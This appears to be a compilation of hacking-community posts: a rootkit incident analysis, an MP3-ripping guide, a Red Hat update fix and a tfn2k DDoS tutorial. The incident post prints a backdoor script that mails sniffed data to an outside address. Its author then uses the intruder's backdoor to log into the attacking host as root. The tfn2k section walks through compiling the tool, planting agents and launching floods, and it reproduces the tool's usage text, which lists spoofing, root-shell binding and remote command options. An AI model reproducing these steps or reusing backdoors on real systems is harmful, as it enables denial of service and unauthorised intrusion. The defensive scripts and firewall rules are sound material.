UNDERCODE COMMUNITY
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Tracking a hack: full tutorial by Undercode
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) I checked my machine and unexpectedly discovered that it had been hacked. It was actually my own mistake: I had not patched wuftpd26, and I had not changed /etc/ftpusers either, so people could easily use the wuftpd26 remote vulnerability to get into my machine as an anonymous user. However, this visitor apparently used the rootkit carelessly.

🦑 As a result, the output of ps is as follows:
[root@ns]# ps
PID TTY STAT TIME COMMAND
678 1 S 0:00 /sbin/mingetty tty1
679 2 S 0:00 /sbin/mingetty tty2
680 3 S 0:00 /sbin/mingetty tty3
681 4 S 0:00 /sbin/mingetty tty4
682 5 S 0:00 /sbin/mingetty tty5
683 6 S 0:00 /sbin/mingetty tty6
5557 ? S 0:00 /bin/sh -i
5591 ? R 0:00 ps

🦑 I think anyone knows what that means. So let's go step by step and see what he did
[this hacker did not expect that this machine already had an owner, and installed his own rootkit toolkit]

1) [root@ns]# strings /bin/login | more
..........
__bss_start
_end
PPRV
DISPLAY
/bin/envpc
l4m3r0x
/bin/sh

2) From the above, it can be seen that it is a login backdoor: after export PATH="l4m3r0x", you can telnet to the machine directly and get a # prompt.
[root@ns]# strings /bin/ls | more
.....
always
/usr/local/share/locale
fileutils
GNU fileutils-3.13
vdir
%s - %s
/dev/sgk/.fsdc/.1file
//DIRED//
//SUBDIRED//
POSIXLY_CORRECT
COLUMNS

3) Note that /dev/sgk/.fsdc/.1file is where his rootkit files are located, so let's see what is there
[root@ns]# mv /dev/sgk/.fsdc/.1file /tmp
[root@ns]# ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2 undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undercode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
-rwxr-xr-x 1 undercode 28004 Aug 23 ps-real
-rwxr-xr-x 1 undercode 580696 Feb 18 2000 ssh
-rw-r--r-- 1 root ftp 1398 Feb 4 08:55 system

4) Oh, it seems there are quite a lot of things here. From ftp, we can tell that he used the FTP vulnerability. From lujiang, he had also stolen a local user account
[root@ns .fsdc]# cat .1logz
rshd
[root@ns .fsdc]# cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root@ns .fsdc]# cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse

5) .1logz is read by syslogd, which hides the records generated by the listed commands.
.1proc is read by the ps command, which hides the listed process names.
.1file is read by the ls command, which hides the listed file names.
[root@ns .fsdc]# cd patches
[root@ns patches]# cat patch.sh
#!/bin/sh
echo "[1] Patching WU-FTPd..."
rpm -Uhv wuftpd.rpm
echo "[2] Patching NFS-utils..."
rpm -Fvh nfs-utils.rpm
ps aux >> /tmp/psaux
if [ "`cat /tmp/psaux | grep rpc.statd`" ]; then
echo "[3] Restarting the rpc.statd daemon (NFS-utils)"
/etc/rc.d/init.d/nfslock restart
else
echo "[4] The daemon rpc.statd isn't running, so no need to restart!"
fi
rm /tmp/psaux

6) This is a patch package for the wuftpd and rpc.statd vulnerabilities.
I did not read the other files and directories carefully [a download package of these will be provided].
Following the list of hidden files in .1file, let us find these files one by one.
[root@ns .fsdc]# strings /usr/bin/xtty
......
PPRV
(nfsiod)
socket
bind
listen
accept
/bin/sh
7) It is not difficult to see that it is a backdoor
[root@ns .fsdc]# strings /dev/pttys
#!/bin/sh
cat /dev/sgk/.fsdc/system | mail prosupp@usa.net > /dev/null 2>&1
nohup /usr/lib/lpset > /dev/null &
nohup /usr/bin/xtty > /dev/null &
rm -rf nohup.out
This hacker is very smart: this script mails the sniffing records to prosupp@usa.net [/dev/sgk/.fsdc/system is a sniffing record]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit | more
..........
if [ "$PROMPT" != "no" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd | more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]='%.100s', error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new %d bit RSA key.
RSA key generation complete.
f:p:b:k:h:g:diqV:
i686-unknown-linux
1.2.27
sshd version %s [%s]
Usage: %s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine opens a convenient door for the hacker after startup.
[root@ns .fsdc]# strings /sbin/syslogd
==================================================================
Time: %s Size: %d
Path: %s
=> %s [%d]
------------------------------------------------------------
Exiting...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/dev/null
eth0
system
cant open log

🦑 This hacker turned the syslogd file into a sniffer

. . . . . . . . . .
The next step is to restore the system and change the passwords of the stolen accounts. I will not go into that here. From my sniffing records, I know that he came from these two machines.

[root@ns man]# more system2
=================================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================

🦑 From the above we know that the attack came from 210.217.237.75. Out of habit, the same backdoor is usually installed everywhere, so
[root@ns man]# export DISPLAY="l4m3r0x"
[root@ns man]# telnet 210.217.237.75
Trying 210.217.237.75...
Connected to 210.217.237.75.
Escape character is '^]'.

> Boramae Cache Server 3.5.1

bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 /sbin/mingetty tty5 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
944 6 S 0:00 /sbin/mingetty tty6 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
957 1 S 0:00 -bash HOME=/root PATH=/sbin:/bin:/usr/sbin:/usr/bin SHELL=/
22151 ? S 0:00 -bash HOME=/root USER=root LOGNAME=root PATH=/usr/bin:/bin:
22178 ? S 0:00 \_ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN=|/usr/bin/
. . . . . . . . . .
3) Use the rpm command to check whether commonly used commands have been modified
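
One way to carry out this rpm check, as an added example that is not part of the original post: the functions below read `rpm -Va` output and list packaged files whose digest or mode changed, skipping config and doc files. The sample input is constructed; /bin/login, /bin/ls, /sbin/syslogd and /usr/sbin/nscd are the binaries the post found replaced, while the other paths and the mount point /mnt/suspect are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: triage `rpm -Va` output to find
# packaged programs whose contents no longer match the RPM database.

# Constructed sample of `rpm -Va` output (not taken from the post). Field 1 is
# the flag string (S=size, M=mode, 5=digest, T=mtime); an optional one-letter
# attribute follows (c=config, d=doc, g=ghost); the last field is the path.
sample_rpm_va() {
cat <<'EOF'
S.5....T.    /bin/login
S.5....T.    /bin/ls
..5....T.    /sbin/syslogd
S.5....T.    /usr/sbin/nscd
S.5....T.  c /etc/ftpusers
.......T.  c /etc/inittab
.M.......    /var/spool/mail
missing      /usr/bin/killall
S.5....T.  d /usr/share/doc/wu-ftpd/README
EOF
}

# Read `rpm -Va` output on stdin and print one "REASON PATH" line per finding.
# Assumes paths without spaces. Works for the old 8-flag and the current
# 9-flag layout, because the digest flag is the third character in both.
triage_rpm_va() {
  awk '
    # Files that vanished from a program directory.
    $1 == "missing" {
      if ($NF ~ /\/s?bin\//) print "MISSING " $NF
      next
    }
    # Ignore anything that is not a flag string (warnings, blank lines).
    length($1) < 8 || $1 !~ /^[.?A-Za-z0-9]+$/ { next }
    {
      flags = $1
      path = $NF
      attr = (NF >= 3) ? $2 : ""
      # Config, doc and ghost files are expected to change after installation.
      if (attr == "c" || attr == "d" || attr == "g") next
      if (substr(flags, 3, 1) == "5")      print "DIGEST " path
      else if (substr(flags, 2, 1) == "M") print "MODE " path
    }'
}

# Only the paths whose content digest changed, one per line.
changed_binaries() {
  triage_rpm_va | awk '$1 == "DIGEST" { print $2 }'
}

# Demo on the constructed sample. On a real host, feed it `rpm -Va` instead,
# ideally using rpm from rescue media against the mounted suspect disk
# (rpm -Va --root /mnt/suspect, where /mnt/suspect is a hypothetical mount point).
sample_rpm_va | triage_rpm_va
```

On a host like the one in this post, the installed rpm binary and its database are as untrusted as ps and ls, so a clean result from the running system proves little.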

WRITTEN BY UNDERCODE

🦑 Beautify and Finish: Make MP3s under Linux, by Undercode :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Many friends who like music try to turn their CDs into MP3s on their computers. Of course, Linux users can also make their own MP3s; this is not exclusive to Windows / Mac. This time I will introduce two Linux programs for making MP3s.

My favorite is Grip, written in GTK+.

1) Grip is not actually an MP3 encoder or a CD ripper. It just provides a simple and easy-to-use graphical interface so that you don't have to use commands to make MP3s.

2) As for the CD ripper (the program that grabs CD tracks), Grip supports cdparanoia and cdda2wav. As for the MP3 encoder, it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode, gogo and others, which is quite a good selection! I use cdparanoia and bladeenc.

🦑 The following are the URLs of some CD rippers / MP3 encoders:

1) CD ripper
· cdparanoia
http://www.xiph.org/paranoia
· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav

2) MP3 encoder
· BladeEnc
http://bladeenc.mp3.no
· LAME
http://www.sulaco.org/mp3
· gogo
http://homepage1.nifty.com/herumi/gogo_e.html

3) Choose one CD ripper and one MP3 encoder; you can use Grip once they are installed. If you use rpm, I suggest cdparanoia / cdda2wav + gogo. Their RPMs can be downloaded from the following URLs:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386.html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35-1.i386.rpm

4) If you are using Debian / Corel / Storm linux, you can use the two Debian packages cdparanoia / cdda2wav. Because of copyright issues, however, Debian has no MP3 encoder package, so you need to install one yourself.

5) After you have installed the CD ripper and MP3 Encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can go to "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm" to download its RPM package, and the Debian package Grip, you can download and install with apt-get.

6) Enter the execution instruction grip, and you can see the main program screen of Grip. First, we need to set up the CD ripper and MP3 encoder used. Click on the Config page, select Rip, and select the installed CD Ripper in Ripper. Then select MP3 from Config and select an installed MP3 encoder in the Encoder field.

7) Then put your favorite audio CD into the CD-ROM drive, and you will see that the list in Tracks is updated automatically. If you have time, you can click the "Pencil" button below to give the CD and its tracks proper names. In the list, press the right mouse button to select songs. After selecting them, go to the Rip page and press Rip + Encode, and the selected tracks will be made into MP3s. Grip can also grab part of a track: select Rip partial track, press Play, note the sectors at the beginning and end of the part, and enter them in Start sector and End sector respectively. When the process is complete, the MP3s are in the mp3 directory in your home directory, i.e. ~/mp3/.

🦑 KDE Department: Krabber

1) Krabber is another frontend for CD rippers and MP3 encoders. Krabber is developed with Qt and the KDE libraries, so only KDE users can use it. This is a major disadvantage of Krabber ... (I had not used KDE, and I had to install KDE). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc and xingmp3enc, and it can automatically detect whether the system has the required components.
2) It needs mpg123 to play MP3s. Krabber's settings are similar to Grip's: Format selects the installed MP3 encoder, and the first box in Generic Options selects your input device, such as /dev/hdc (the CD-ROM drive). One feature of Krabber that Grip lacks is adjusting CPU usage, so that you can record MP3s while working. Krabber is relatively easy to use; just follow its four steps:
choose a song, choose a directory, choose a file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org

WRITTEN BY UNDERCODE

🦑 RedHat Installation and Startup: Solving SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) First download the following files into the same directory
* up2date-3.1.23.2-1.i386.rpm - MD5 Checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm - MD5 Checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm

2) Check the MD5 checksum
[user@localhost user]$ md5sum 'filename'

3) [user@localhost user]$ su
Password: (enter root password)

4) [root@localhost user]# rpm -Fvh up2date-*

5) [root@localhost user]# up2date -p

If the connection is refused at step 5, it is because RH requires you to reactivate your account. You can go to https://rhn.redhat.com/renew/, enter your username and answer the questions to activate your account.
Other versions are handled the same way.

WRITTEN BY UNDERCODE

🦑 Network filtering: distributed denial of service (tfn2k) attack and iptables filtering test, full, by Undercode :
instagram.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

A denial of service (DoS) attack can refer to any operation that prevents a service from being provided normally, for example software bugs or operating errors. However, DoS caused by operating errors is rare; most cases are malicious attacks. Denial of service attacks have now evolved into distributed denial of service (DDoS) attacks, which concentrate many agents on one target and are therefore more harmful.

> We all know that TCP/IP has become the framework protocol of the entire Internet. It can be said that without TCP/IP the Internet would at least not be as popular as it is now, and might not exist at all. But everything has two sides: TCP/IP benefits us all, and because of problems in the protocol itself it has also become a tool for others to attack us. We will use the TCP three-way handshake that establishes a connection to illustrate.

🦑 One. The TCP SYN flood

1) The client sends a TCP packet with the SYN (synchronize) flag to the server. This packet contains basic information such as the client port and the TCP sequence number.

2) After the server receives the SYN packet, it sends a SYN-ACK packet to acknowledge it.

3) After receiving the SYN-ACK packet from the server, the client sends an ACK back to the server. When the server receives this packet, the TCP connection is established and the two parties can communicate (it feels like a wedding: bow to heaven and earth ... bow to the parents ... into the bridal chamber ... haha).

> The problem lies in step 3. If the server does not receive the client's ACK packet, it waits. This state is called the semi-connected (half-open) state, and it is kept for a certain period of time (the exact time varies between operating systems). If the SYN requests exceed the limit the server can hold and the buffer queue is full, the server stops accepting new requests, and connections from other legitimate users are rejected. This kind of attack takes little effort and is extremely damaging.
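
The half-open state described above can be observed on the server side. This added example (not from the original post) counts SYN-RECV sockets per local port from `ss -ant` or `netstat -ant` output; the sample listing, the source addresses and the threshold are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: count half-open (SYN-RECV) TCP
# connections per local port from `ss -ant` or `netstat -ant` output.

# Constructed `ss -ant` sample: 200 half-open connections to port 80, each from
# a different source in the 198.18.0.0/15 benchmarking range, plus normal traffic.
sample_ss_output() {
  echo "State    Recv-Q Send-Q Local Address:Port Peer Address:Port"
  echo "LISTEN   0      128    0.0.0.0:80         0.0.0.0:*"
  echo "ESTAB    0      0      192.168.0.5:22     192.168.0.6:51000"
  echo "SYN-RECV 0      0      192.168.0.5:22     192.168.0.6:51002"
  i=1
  while [ "$i" -le 200 ]; do
    echo "SYN-RECV 0 0 192.168.0.5:80 198.18.0.$i:$((1024 + i))"
    i=$((i + 1))
  done
}

# Read a socket listing on stdin and print, sorted by port,
#   PORT HALF_OPEN DISTINCT_SOURCES VERDICT
# $1 is the alert threshold (default 100). The local address is field 4 in
# both tools; the state is field 1 for ss and field 6 for netstat.
# Grouping is by local port, not by source: with forged source addresses
# every half-open entry tends to come from a different address.
half_open_by_port() {
  awk -v limit="${1:-100}" '
    $1 == "SYN-RECV" || $6 == "SYN_RECV" {
      n = split($4, addr, ":")         # last element is the port (IPv4 or IPv6)
      port = addr[n]
      peer = $5
      sub(/:[0-9]+$/, "", peer)        # strip the peer port, keep the address
      count[port]++
      if (!((port, peer) in seen)) { seen[port, peer] = 1; sources[port]++ }
    }
    END {
      for (p in count)
        print p, count[p], sources[p], (count[p] >= limit ? "SUSPECT" : "ok")
    }' | sort -n
}

# Demo on the constructed sample; on a live Linux server use
#   ss -ant | half_open_by_port 100
sample_ss_output | half_open_by_port 100
```

On Linux the size of this queue and the fallback when it fills are governed by the `net.ipv4.tcp_max_syn_backlog` and `net.ipv4.tcp_syncookies` kernel settings.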
Of course, there are many other DoS attack methods, such as UDP flood, ICMP/Ping, ICMP/SMURF ...; for the specific principles, take a look at http://www.chinaitlab.com/www/special/ciwddos.asp, which explains the principles in detail and introduces the commonly used attack software. However, when it comes to DoS attack software, the most representative is tfn2k (Tribe Flood Network 2000), whose author is the famous Mixter from Germany (his home page is http://mixter.void.ru/papers.html). It seems he is currently buried in work on some tfn3k; hey, I don't know how many people will lose sleep and appetite over that ...

🦑 Two. tfn2k attack principle

1) tfn2k attack system.

tfn2k should be regarded as a masterpiece among DDoS attack tools, and its functions are astounding ... (my awe of it is like a river, it flows on and on ...). Let's take a look at its architecture.

Master --- runs the tfn client to remotely control the agents, specify attack targets and change the attack method. (Sinister villain)

Agent --- a victim host on which the td process has been implanted and is running; it accepts commands from tfn and carries out the attack. Note that an attacker often controls multiple agents to complete an attack, and these systems are mostly unix, linux, etc. (Poor victim)

Target host --- the host or network hit by the DDoS, such as Yahoo, Amazon, CNN, e-bay, etc. (the biggest victim, as depressed as me)

2) tfn2k features.

◆ The master sends commands to the agent hosts in TCP, UDP or ICMP packets, or in a randomly chosen one of the three (the default is random). The attack methods include TCP/SYN, UDP, ICMP/PING, mixed attacks, TARGA3, etc.

◆ Communication between the master and the agents is one-way: the master only sends commands to the agent, using random header information and even forged source addresses, and the agent never sends anything back to the master.

◆ All commands are encrypted with the CAST-256 algorithm. The key is a password entered at compile time, and this password is the only authentication credential.

◆ Using the td process, the master can execute remote shell commands.

◆ The name of the td process can be changed at compile time, which makes it easier to hide.

◆ tfn can be compiled and run on win32 and linux systems

...

As for forging the source IP address, that is a basic feature; compared with the old version of tfn, it also sends packets more efficiently. In my own test, two agent machines paralyzed my redhat linux 9.0 system in less than 5 minutes.

🦑 Three. tfn2k actual test

1) Test environment:

  Software: redhat linux 9.0
  Hardware platform:
    master:
      IP: 192.168.0.6
      PIV2.4 / 256 * 2 / rtl8139
    ag1:
      IP: 192.168.0.2
      PIV2.4 / 256 * / rtl8139
    ag2:
      IP: 192.168.0.3
      PIV2.6 / 512 * 2 / 3c905
    aim:
      IP: 192.168.0.5
      PIV2.66c / 512 * 2 / 3c905
    switch: D_link des 1024R

1) Download tfn2k.tgz (because this software is unusual, I do not provide the download address; if you are interested, find it online)

2) Unpack: tar zxvf tfn2k.tgz

3) Modify the files

A. src/Makefile: if your system is Linux, you do not need to change anything. If it is a win32 system, comment out these lines:

    # Linux / *BSD* / Others
    CC = gcc
    CFLAGS = -Wall -O3
    CLIBS =

and uncomment these lines:

    # Win32 (cygwin)
    #CC = gcc
    #CFLAGS = -Wall -DWINDOZE -O2
    #CLIBS =

Because my test system is redhat linux 9.0, I made no changes.

B. src/config.h works with its defaults. If you are interested, you can adjust it according to its comments.

C. src/ip.h needs a change, otherwise compilation fails with duplicate definition errors.

    /* struct in_addr
    {
      unsigned long int s_addr;
    }; */

Note: I put it between "/* */", that is, commented it out :)

D) Change the compiler:

tfn2k supports egcs-1.1.2-30, while redhat linux 9.0 contains gcc-3.2.2-5, so tfn2k cannot be compiled unless you replace gcc. Note that after the change, software that depends on gcc 3.2.2 will no longer compile, so please be cautious.

The method is very simple: find a redhat linux 6.2 installation disc and copy egcs-1.1.2-30.rpm and cpp-1.1.2-30.rpm to ~/

    cd /mnt/cdrom/Redhat/RPMS
    cp egcs-1.1.2-30* cpp-1.1.2-30* ~/

Install cpp: rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm

Install egcs: rpm -Uvh egcs-1.1.2-30.i386.rpm

(if errors are reported, use parameters such as nodeps, oldpackage and ignoreos to get past them)

4) Compile tfn2k

    cd tfn2k/src
    make

First a statement is displayed, which you must accept. Then you are prompted to enter an 8-32 bit password. As mentioned earlier, this is the only authentication credential and it is built into the td process, so be sure to remember it.

After compiling, td and tfn are generated. This is the famous tfn2k: td is the daemon that is installed on the agent, and tfn is the control end.

5) Install td.

Upload td to my two agents, ag1 (192.168.0.2) and ag2 (192.168.0.3). Because I am just testing, I use a legitimate root account to upload and run the td process. If you really wanted to find and install an agent, you would have to pray to God, because no administrator will say "come on baby, I will give you root, go ahead and install td as an agent".

[root@test /] ftp 192.168.0.2
    Connected to 192.168.0.2.
    530 Please login with USER and PASS.
    530 Please login with USER and PASS.
    Name (192.168.0.2:root): wjpfjy
    331 Please specify the password.
    Password:
    230 Login successful. Have fun.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> put td (upload td)
    local: td remote: td
    227 Entering Passive Mode (192,168,0,3,198,225)
    553 Could not create file.
    ftp> by (quit ftp)
    221 Goodbye.

[root@test /] ssh 192.168.0.2
// Log in to ag1 to run td. Note that I use the root account so that I have sufficient permissions to run it.
    root@192.168.0.2's password:
    Last login: Tue Feb 24 06:51:13 2004
[root@ag1 /] find / -name td -print
// Find the td file just uploaded.
[root@ag1 wjpfjy/] chmod a+x td
// Make it executable.
[root@ag1 wjpfjy/] ./td
// Run td. Now you have an agent, and it only takes orders from you :(

Use the same method to install and run the tfn2k td process on ag2 (192.168.0.3).

6) The attack begins (the tragic memory is being staged ...)

Return to the master (192.168.0.6) and prepare for the exercise ...

[root@master root]# touch host.txt
// Create an agent record file (because if you are bored enough you may collect a lot of "broilers", that is, agents;
// if you do not write them down you will forget them.)
[root@master root] echo "192.168.0.2" > host.txt
// Add ag1, which is already running td, to host.txt.
[root@master root] echo "192.168.0.3" >> host.txt
// Add ag2 to host.txt.

First, let's test the link.

[root@master root] ./tfn -f host.txt -c 10 -i "mkdir wjpfjy"
// Communicate with the agents in host.txt and have them execute the command mkdir wjpfjy to create a directory

    Protocol: random
    Source IP: random
    Client input: list
    Command: execute remote command

    Password verification:
// Here you are prompted for the password, which is the one entered at compile time. If you get it wrong, you cannot communicate with the td process.

    Sending out packets: ..

Go to ag1 and ag2 and check whether a directory named wjpfjy has been created. Generally it is in the same directory as td. If you are not sure, you can use find / -name wjpfjy -print to look for it.

[root@master root] ./tfn -f host.txt -c 6 -i 192.168.0.5
// Start an ICMP/PING attack on aim ... (my poor P4: in less than 5 minutes it was as slow as a 386.) But before it was game over, it still struggled to record the attack data. This is the packet capture recorded by tcpdump.
[root@aim root]# tcpdump -r pack.atta -c 4 -xX
08:03:36.524907 23.43.171.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E..e ..... + ..
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ........... .....
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply
0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E ... @. Q .....
0x0010 172b ab00 0000 ffff 0000 0000 0000 0000. + ..............
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E..e ... n $ ...
0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 ......
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0050 0000 ..
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply
0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E..U ... @ .......
0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $ ..................
0x0020 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0030 0000 0000 0000 0000 0000 0000 0000 0000 ......
0x0040 0000 0000 0000 0000 0000 0000 0000 0000 ......


[root@master root] ./tfn -f host.txt -c 0
// Stop the attack

    Protocol: random
    Source IP: random
    Client input: list
    Command: stop flooding

    Password verification:

    Sending out packets: ...

Of course, there are other attack methods. You can change the attack method with -c X.

[root@master root] ./tfn
usage: ./tfn
[-P protocol]       Protocol for server communication. Can be ICMP, UDP or TCP.
                    Uses a random protocol as default
[-D n]              Send out n bogus requests for each real one to decoy targets
[-S host/ip]        Specify your source IP. Randomly spoofed by default, you need
                    to use your real IP if you are behind spoof-filtering routers
[-f hostlist]       Filename containing a list of hosts with TFN servers to contact
[-h hostname]       To contact only a single host running a TFN server
[-i target string]  Contains options/targets separated by '@', see below
[-p port]           A TCP destination port can be specified for SYN floods
<-c command ID>     0 - Halt all current floods on server(s) immediately
                    1 - Change IP antispoof-level (evade rfc2267 filtering)
                        usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
                    2 - Change Packet size, usage: -i
                    3 - Bind root shell to a port, usage: -i
                    4 - UDP flood, usage: -i victim@victim2@victim3@...
                    5 - TCP/SYN flood, usage: -i victim@... [-p destination port]
                    6 - ICMP/PING flood, usage: -i victim@...
                    7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
                    8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
                    9 - TARGA3 flood (IP stack penetration), usage: -i victim@...
                    10 - Blindly execute remote shell command, usage: -i

🦑 Four. Defensive approach

As every DDoS article on the Internet says, DDoS is hard to detect. I tried to filter out all ICMP packets at the firewall to protect my host, but all I achieved was that my host crashed a little later. Hey, do not expect me to guard against DDoS; if I could guard against it, I would not be losing sleep :(

It is still the old saying: what we can do is try our best not to let our hosts become agents for other people's attacks, and strictly restrict what leaves the intranet, so that we do no harm to others. As long as everyone does this, our network environment can be safer, and at least I can sleep peacefully for a few days.

Attached is part of my firewall. It is mainly aimed at ICMP/PING, but it is not very useful :(
# Default policy: drop everything that no rule below accepts
/sbin/iptables -P INPUT DROP
/sbin/iptables -A INPUT -i lo -p all -j ACCEPT
# ICMP is accepted on eth1; echo requests (type 8) are dropped on every other interface
/sbin/iptables -A INPUT -i eth1 -p icmp -j ACCEPT
/sbin/iptables -A INPUT -p icmp --icmp-type 8 -j DROP
# Drop packets arriving on eth0 with loopback, LAN or private source addresses
# (LAN_NET must be set earlier in the script)
/sbin/iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT
/sbin/iptables -A INPUT -s 127.0.0.2 -i eth0 -j DROP
/sbin/iptables -A INPUT -s $LAN_NET/24 -i eth0 -j DROP
/sbin/iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP
/sbin/iptables -A INPUT -s 10.0.0.0/8 -i eth0 -j DROP
# Accept any eth0 packet within 1 per second (burst 5); packets over the limit continue down the chain
/sbin/iptables -A INPUT -i eth0 -m limit --limit 1/sec --limit-burst 5 -j ACCEPT
/sbin/iptables -A INPUT -i eth0 -p udp -m state --state NEW -j REJECT
# Services: ssh and http on any interface, DNS on eth1
/sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT
/sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
